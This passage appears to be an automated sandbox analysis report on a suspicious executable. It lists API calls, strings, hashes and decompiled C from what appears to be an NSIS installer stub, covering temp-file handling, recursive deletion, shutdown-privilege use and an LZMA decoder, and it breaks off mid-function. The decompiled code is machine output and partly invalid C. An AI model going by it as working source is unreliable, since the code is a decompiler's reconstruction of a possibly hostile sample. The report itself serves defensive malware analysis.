0x00403a0e
0x00403a15
0x00403a15
0x00403a15
0x00403a15
0x00403a1c
0x00000000
0x00403a1c
0x0040394e
0x004038d2
0x004038d5
0x004038d9
0x004038de
0x004038e0
0x00000000
0x00000000
0x004038ec
0x004038f7
0x004038fc
0x00000000
0x004038fc
0x0040387a
0x00403892
0x004038a3
0x004038a4
0x004038a8
0x004038aa
0x004038b8
0x004038bf
0x00000000
0x00000000
0x00000000
0x004038bf
0x004038c1
0x00000000
0x004038c1
0x004037e4
0x004037f0
0x004037f5
0x004037fa
0x004037fc
0x00000000
0x00000000
0x00403804
0x0040380c
0x0040381d
0x00403825
0x00403827
0x0040382c
0x0040382e
0x00000000
0x00000000
0x00000000
0x0040382e
0x00000000
0x0040378b
0x00403734
0x00403736
0x00000000
0x00000000
0x00403738
0x0040373c
0x00403740
0x00403747
0x00403747
0x00403747
0x00403747
0x00000000
0x00403747
0x00403742
0x00403745
0x00000000
0x00000000
0x00000000
0x00403745
0x004036de
0x004036e2
0x004036e5
0x004036ec
0x004036ec
0x00000000
0x004036ec
0x004036e7
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036ea
0x00000000
0x00000000
0x00000000
0x004036b8
0x004036b8
0x004036b9
0x004036ba
0x004036ba
0x00000000
0x004036b8
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 0040351A
GetVersionExW.KERNEL32(?), ref: 00403543
GetVersionExW.KERNEL32(0000011C), ref: 0040355A
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
#17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
OleInitialize.OLE32(00000000), ref: 00403634
SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
CharNextW.USER32(00000000,"C:\Users\user\Desktop\ypdTgfE0o8.exe" ,00000020,"C:\Users\user\Desktop\ypdTgfE0o8.exe" ,00000000), ref: 004036A0
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
DeleteFileW.KERNELBASE(1033), ref: 00403839
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F

Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ypdTgfE0o8.exe" ,00000000,?), ref: 00403946
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
CopyFileW.KERNEL32(C:\Users\user\Desktop\ypdTgfE0o8.exe,00420EC8,00000001), ref: 004039D8
CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
ExitProcess.KERNEL32(?), ref: 00403A23
OleUninitialize.OLE32(?), ref: 00403A28
ExitProcess.KERNEL32 ref: 00403A42
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
ExitProcess.KERNEL32 ref: 00403AD6

Strings

Error launching installer, xrefs: 004038C9
C:\Users\user\AppData\Local\Temp, xrefs: 004037B8, 004038E7, 0040396E, 00403978
TEMP, xrefs: 00403818
Low, xrefs: 00403806
C:\Users\user\AppData\Local\Temp\, xrefs: 004037C8, 004037CD, 004037E3, 004037EF, 004037FE, 0040380B, 00403817, 0040381F, 0040391D, 0040392E, 00403939, 00403945, 00403956, 00403965, 00403A1B
SeShutdownPrivilege, xrefs: 00403A6B
1033, xrefs: 00403834
C:\Users\user\Desktop\ypdTgfE0o8.exe, xrefs: 004039D3
~nsu, xrefs: 00403918
\Temp, xrefs: 004037EA
"C:\Users\user\Desktop\ypdTgfE0o8.exe" , xrefs: 0040366D, 00403673, 00403688, 0040385F, 0040386B, 004038B9, 004038C3
UXTHEME, xrefs: 004035E5, 004035EA, 004035F0
.tmp, xrefs: 00403934
NSIS Error, xrefs: 00403658
TMP, xrefs: 00403820

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\ypdTgfE0o8.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\ypdTgfE0o8.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2292928366-2971669607
Opcode ID: 0f3df21176a0be8cd9ff5477b57629174c4823c088433172f8501f5a44e58711
Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
Opcode Fuzzy Hash: 0f3df21176a0be8cd9ff5477b57629174c4823c088433172f8501f5a44e58711
Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C13 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405C13(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405EDE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2a8 =  *0x42a2a8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406507(0x425710, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E22(_t68);
					} else {
						lstrcatW(0x425710, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425710,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406507(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405BCB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405569(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2a8 =  *0x42a2a8 + 1;
										} else {
											E00405569(0xfffffff1, _t68);
											E004062C7(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C13(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425710 - 0x5c;
					if( *0x425710 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040683D(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405DD6(_t68);
							_t38 = E00405BCB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405569(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405569(0xfffffff1, _t68);
							return E004062C7(_t67, _t68, 0);
						}
						L30:
						 *0x42a2a8 =  *0x42a2a8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405c1d
0x00405c22
0x00405c2b
0x00405c2e
0x00405c36
0x00405c39
0x00405c3c
0x00405c44
0x00405c46
0x00405c47
0x00000000
0x00405c47
0x00405c52
0x00405c55
0x00405c55
0x00405c55
0x00405c59
0x00405c6c
0x00405c73
0x00405c78
0x00405c7c
0x00405c8c
0x00405c7e
0x00405c84
0x00405c84
0x00405c91
0x00405c95
0x00405ca1
0x00405ca7
0x00405cac
0x00405cb2
0x00405cbd
0x00405cc3
0x00405cc5
0x00405cc8
0x00405d72
0x00405d72
0x00405d76
0x00405d78
0x00405d78
0x00405d78
0x00405d78
0x00000000
0x00000000
0x00000000
0x00000000
0x00405cce
0x00405cce
0x00405cce
0x00405cd6
0x00405cf6
0x00405cfe
0x00405d03
0x00405d0a
0x00405d25
0x00405d2a
0x00405d2c
0x00405d50
0x00405d2e
0x00405d2e
0x00405d31
0x00405d45
0x00405d33
0x00405d36
0x00405d3e
0x00405d3e
0x00405d31
0x00405d0c
0x00405d12
0x00405d14
0x00405d1a
0x00405d1a
0x00405d14
0x00000000
0x00405d0a
0x00405cd8
0x00405ce0
0x00000000
0x00000000
0x00405ce2
0x00405cea
0x00000000
0x00000000
0x00405cec
0x00405cf4
0x00000000
0x00000000
0x00000000
0x00405d55
0x00405d5d
0x00405d63
0x00405d63
0x00405d6c
0x00000000
0x00405d6c
0x00405c97
0x00405c9f
0x00000000
0x00000000
0x00000000
0x00405c5b
0x00405c5b
0x00405c5d
0x00405d7d
0x00405d7f
0x00405d82
0x00405dd3
0x00405dd3
0x00405dd3
0x00405d84
0x00405d87
0x00405d92
0x00405d97
0x00405d99
0x00000000
0x00000000
0x00405d9c
0x00405da8
0x00405dad
0x00405daf
0x00000000
0x00405dca
0x00405db1
0x00405db4
0x00000000
0x00000000
0x00405db9
0x00000000
0x00405dc0
0x00405d89
0x00405d89
0x00000000
0x00405d89
0x00405c63
0x00405c66
0x00000000
0x00000000
0x00000000
0x00405c66

APIs

DeleteFileW.KERNELBASE(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa8A55.tmp\*.*,\*.*), ref: 00405C84
lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsa8A55.tmp\*.*,?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsa8A55.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsa8A55.tmp\*.*,?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
FindClose.KERNELBASE(00000000), ref: 00405D6C

Strings

., xrefs: 00405CE2
., xrefs: 00405CCE
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C20
C:\Users\user\AppData\Local\Temp\nsa8A55.tmp\*.*, xrefs: 00405C6C, 00405C72, 00405C83, 00405CBC
\*.*, xrefs: 00405C7E

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa8A55.tmp\*.*$\*.*
API String ID: 2035342205-3350414694
Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406BFE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
